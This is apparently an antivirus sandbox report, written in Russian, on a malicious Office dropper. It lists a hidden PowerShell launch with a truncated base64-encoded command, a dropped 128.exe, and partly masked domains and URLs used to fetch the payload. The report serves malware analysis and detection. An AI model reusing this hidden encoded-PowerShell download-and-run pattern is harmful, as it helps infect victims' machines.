Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABJAG4AbwByAGIAegBlAGoAbwBzAGMAcwA9ACcAWQB6AGYAZwBwAHkAbgBzAHkAJwA7ACQATQB6AGgAZAB6AHgAYgB6AGcAZQBkAGoAIAA9ACAAJwAxADIAOAAnADsAJABCAGUAdABrAHoAcQBhAHQAPQAnAEwAagBxAHMAcQBkAGwAbwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1512
- %TEMP%\1245340.cvr
- %HOMEPATH%\128.exe
- %HOMEPATH%\128.exe
- 'nf##gro.com':80
- 'mo####studios.com':80
- 'mo####studios.com':443
- 'lo##s.com':80
- 'lo##s.com':443
- http://nf##gro.com/web_map/FF/
- http://www.mo####studios.com/error/kx8/
- http://www.lo##s.com/wp-content/uploads/fnf8/
- 'mo####studios.com':443
- 'lo##s.com':443
- DNS ASK nf##gro.com
- DNS ASK bl##.####itetofabiopalheta.com
- DNS ASK ec###.e-lyfe.com
- DNS ASK mo####studios.com
- DNS ASK lo##s.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABJAG4AbwByAGIAegBlAGoAbwBzAGMAcwA9ACcAWQB6AGYAZwBwAHkAbgBzAHkAJwA7ACQATQB6AGgAZAB6AHgAYgB6AGcAZQBkAGoAIAA9ACAAJwAxADIAOAAnADsAJABCAGUAdABrAHoAcQBhAHQAPQAnAEwAagBxAHMAcQBkAGwAbwB... (со скрытым окном)